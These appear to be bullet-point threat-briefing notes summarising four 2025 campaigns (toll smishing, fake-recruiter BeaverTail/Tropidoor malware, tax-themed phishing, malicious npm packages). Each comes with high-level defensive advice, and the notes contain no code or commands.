Links 

https://www.axios.com/local/phoenix/2025/04/14/toll-scam-texts-arizona-drivers

https://cybersecuritynews.com/beware-of-fake-unpaid-toll-message-attack

https://www.businessinsider.com/ezpass-text-scam-how-to-spot-2025-3

https://cybersecuritynews.com/beware-of-weaponized-recruitment-emails/

https://cybersecuritynews.com/squid-werewolf-mimic-as-recruiters-attacking-job-seekers/

https://www.techradar.com/pro/security/look-out-for-tax-themed-scams-this-month-microsoft-warns

https://thehackernews.com/2025/04/microsoft-warns-of-tax-themed-email.html

https://thehackernews.com/search/label/Remote%20Access%20Trojans

https://thehackernews.com/2024/12/north-korean-hackers-deploy-ottercookie.html

https://thehackernews.com/2025/04/north-korean-hackers-deploy-beavertail.html

Fake Unpaid Toll Messages Target Mobile Users in Credential Theft Scam 

• In Short 
  

• A sophisticated smishing (SMS phishing) campaign is targeting mobile users with fake unpaid toll notifications, aiming to steal personal and financial information.  

• Victims receive text messages claiming they have unpaid tolls, often threatening fines or license suspension to create urgency. 

• Attack:  

• the message lacks a direct link 

• prompting the recipient to reply. 

• attackers send a second message containing a link to a fraudulent website 

• Mimics official toll collection agencies. 

• Targeted 

• adapts to the victim’s location 

• regional branding and visuals to enhance credibility. 

• “Lucid,” 

• Phishing-as-a-Service (PhaaS) 

• Infrastructure 

• Authorities across multiple states 

• issued warnings about these scams. 

• Defend Yourself 

• Educate Employees via regular training sessions to raise awareness 

• Especially about smishing tactics 

• how to recognize suspicious messages. 

• User or deploy mobile device management (MDM) systems  

• detect and block malicious messages and links.  

• Encourage employees to verify any unexpected payment requests through official channels rather than responding directly to messages.  

• Monitor for Phishing Domains 

• Threat Intelligence 

• Instruct employees to report suspected smishing attempts to the organization’s IT or security team promptly. 

Weaponized Recruitment Emails Delivering BeaverTail and Tropidoor Malware 

• In Short 

• A recent cybersecurity campaign has emerged where threat actors impersonate recruiters to distribute malware, specifically targeting job seekers. This tactic exploits individuals’ eagerness to explore employment opportunities, leading to the inadvertent installation of malicious software. 

• Impersonation of Recruiters 

• Attackers pose as recruitment professionals, sending emails with links to code repositories under the guise of job opportunities.  

• The repositories contain seemingly legitimate project files 

• including a tailwind.config.js file 

• embedded with obfuscated JavaScript code. 

• executes a downloader 

• car.dll 

• Malware Components 

• BeaverTail 

• A JavaScript-based malware disguised within configuration files. Cyber Security News 

• Tropidoor 

• A backdoor that establishes encrypted communication with command-and-control servers 

• capable of executing over 20 different commands, including file manipulation and process injection. 

• (LoLBins) Living off the Land  

• Windows tools like PowerShell and rundll32 

• to execute its payloads, aiding in evasion from security detections. 

• stealing web browser credentials and cryptocurrency wallet information 

• Attribution 

• Evidence suggests links to North Korean threat actors 

• techniques resembling those used by the Lazarus Group. 

• Defense 

• Conduct regular training sessions to raise awareness about phishing tactics, emphasizing caution with unsolicited job-related communications.  

• Implement advanced email filtering systems to detect and block phishing attempts.  

• Endpoint Protection: Deploy robust endpoint detection and response (EDR) tools capable of identifying and mitigating malicious activities. 

• Continuously monitor network traffic for unusual patterns that may indicate compromised systems communicating with external servers.  

• Enforce the principle of least privilege, ensuring users have only the access necessary for their roles, limiting potential damage from compromised accounts.  

Cybercriminals Exploit Tax-Themed Phishing to Deploy Advanced Malware 

• In Short 

• Microsoft has issued a warning about a surge in tax-themed phishing campaigns exploiting the urgency of the U.S. tax season to distribute malware and steal credentials. These sophisticated attacks employ deceptive tactics, including malicious PDFs and QR codes, to bypass security measures and target a wide range of organizations. 

• Tax Season 

• Cybercriminals are leveraging tax-related themes to craft phishing emails that appear legitimate, aiming to trick recipients into divulging sensitive information. 

• Malicious Attachments 

• PDF attachments containing links or QR codes 

• take users to fraudulent websites 

• trusted services like DocuSign or Microsoft 365 login pages.  

• Malware 

• download malware such as BruteRatel C4 (BRc4) 

• Latrodectus, AHKBot 

• GuLoader 

• Remcos RAT 

• Targeta 

• over 2,300 organizations 

• engineering, IT, and consulting sectors 

• Storm-0249 

• Microsoft attributes this to the group Storm-0249 

•  

• Protect 

• Conduct regular training sessions to raise awareness about phishing tactics 

• advanced email filtering systems capable of detecting and quarantining suspicious messages and attachments.  

• Enforce the use of MFA across all user accounts 

• Ensure all systems and applications are up-to-date with the latest security patches to close known vulnerabilities. 

North Korean Hackers Exploit npm Packages to Distribute BeaverTail Malware in Supply Chain Attack 

• In Short 

• North Korean threat actors, associated with the “Contagious Interview” campaign, have intensified their efforts by distributing the BeaverTail malware through malicious npm packages. These packages, disguised as legitimate developer tools, have been downloaded over 5,600 times, posing significant risks to software supply chains. 

• Malicious npm Packages 

• Eleven npm packages 

• eiwork_hire 

• empty-array-validator 

• Twitterapis 

• dev-debugger-vite 

• events-utils 

• icloud-cod 

• BeaverTail malware 

• These packages were designed to appear as standard utilities 

• Obviously to deceive developers. 

• Obfuscation 

• hexadecimal string encoding 

• evade detection by automated systems and manual code reviews 

• Remote Access Trojan (RAT) 

• malicious code functions as a loader 

• dynamically fetching and executing remote JavaScript via eval(). 

• This allows attackers to run arbitrary code on infected systems, facilitating the deployment of additional malware. 

• Ditributed Distribution 

• Some packages are linked to Bitbucket repositories 

• Diversify their distribution channels beyond npm and GitHub. 

• Campaign 

• exploits job interview themes 

• with packages hosted in directories named “eiwork_hire,”  

• Staying Around  

• creating new npm accounts and deploying varied malware under fresh aliases 

• Protect 

• Only allow the use of vetted and trusted npm packages.  

• Regularly audit dependencies to identify and remove any suspicious or unnecessary packages.  

• Educate developers about the risks of using third-party packages and the importance of verifying the authenticity of packages before integration.  

• Deploy tools that can analyze and monitor code dependencies for malicious behavior, such as dynamic code execution or obfuscated scripts.  

• Keep an eye on outbound network traffic for unusual patterns that may indicate communication with command-and-control servers.